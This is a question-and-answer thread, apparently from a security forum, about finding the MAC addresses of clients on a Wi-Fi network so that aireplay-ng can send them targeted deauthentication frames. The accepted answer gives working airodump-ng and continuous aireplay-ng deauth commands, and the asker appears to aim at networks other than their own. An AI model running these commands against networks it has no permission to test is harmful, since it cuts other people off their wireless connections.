# Broadcast deauth requests are not working

Tags: aircrack-ng

While using aireplay-ng  broadcast deauth requests are not working but if i use deauth for specific user it's working fine. But the problem is i don't know how to get the Mac address of specific user. While trying on your own system it's easy you can just check for your own mac address. But how to get mac address of users on different network? Is there any way to overcome this! Thank you for your time.

Comment: See my answer [how to return client's MAC Address]( http://security.stackexchange.com/a/146458/118310)

Answer (score 1, accepted):

If you are after just any user on that network, you can use `airodump-ng` on a specific BSSID. For example, running the command `airodump-ng wlan0mon --bssid 00:00:00:00:00:AA --channel 1`. Here is a sample output of the command:

```
 CH  1 ][ Elapsed: 10 s ][ 2016-12-31 12:00                              

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:00:00:00:00:AA  -59  93      112      698   69   1  54e  WPA2 CCMP   PSK  Network

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:00:00:00:00:AA  00:00:00:00:00:AB  -37    0e- 0e     0      696
 00:00:00:00:00:AA  00:00:00:00:00:AC  -47    0 - 1      0       24
 00:00:00:00:00:AA  00:00:00:00:00:AD  -66    0 - 1      0       52
```

As you can see, running the above command outputs the BSSID, as well as the devices connected to the BSSID (`00:00:00:00:00:AB`, `00:00:00:00:00:AC`, and `00:00:00:00:00:AD`). Now you can use the command `aireplay-ng --deauth 0 -a 00:00:00:00:00:AA -c 00:00:00:00:00:AB wlan0mon` to deauthenticate the specific client.

Make sure to subsitute this example with your own WiFi card, BSSID MAC address, and channel number. The BSSID and channel you're after can be found by using `airodump-ng wlan0mon`, again using your WiFi card.

Comment: Thank you for your support. I was reading the documentation and i found this in short : to deauth use "aireplay-ng -0 0 -a mac -c mac wlan0". The field -c indicates the mac address of a client to deauthenticate. So that's my question. How to list the clients connected to network. I am somewhat experienced so you can go into details if you know

Comment: I have updated my answer to suit your needs. Using the command listed above should list the clients on that network (BSSID). Let me know if you need further information.

Comment: @Spark Did this answer your question?

Comment: This is nice. And this is exactly what i wanted. I haven't tested it yet but I'm sure i got what I needed. Connected devices bssid. Thank you for your support

Comment: @Spark I'm glad I could help! If my solution had answered your question be sure to mark it as the correct answer.